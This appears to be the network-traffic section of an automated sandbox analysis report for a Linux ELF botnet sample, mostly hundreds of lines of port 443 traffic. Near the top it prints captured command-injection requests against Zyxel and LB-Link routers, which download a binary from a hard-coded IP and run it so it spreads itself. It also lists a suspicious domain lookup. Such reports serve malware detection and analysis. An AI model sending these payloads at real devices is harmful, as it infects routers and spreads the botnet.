            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: unknownDNS traffic detected: queries for: haha.skyljne.click
            Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48X-XSS-Protection: 1;mode=blockContent-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'X-Content-Type-Options: nosniffCONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Fri, 12 Jan 2024 17:25:38 GMTContent-Type: text/htmlX-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.
            Source: zogsXPGVgB.elfString found in binary or memory: http://103.245.236.188/skyljne.mips;$
            Source: zogsXPGVgB.elfString found in binary or memory: http://103.245.236.188/skyljne.mpsl;
            Source: zogsXPGVgB.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: zogsXPGVgB.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16865
            Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
            Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
            Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
            Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
            Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
            Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
            Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
            Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
            Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
            Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
            Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
            Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
            Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
            Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
            Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
            Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
            Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
            Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
            Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
            Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
            Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
            Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
            Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
            Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
            Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
            Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
            Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
            Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
            Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
            Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
            Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
            Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
            Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
            Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
            Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
            Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
            Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
            Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
            Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
            Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
            Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
            Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
            Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
            Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
            Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
            Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
            Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
            Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
            Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
            Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
            Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
            Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
            Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
            Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
            Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
            Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41782
            Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
            Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
            Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
            Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
            Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
            Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
            Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
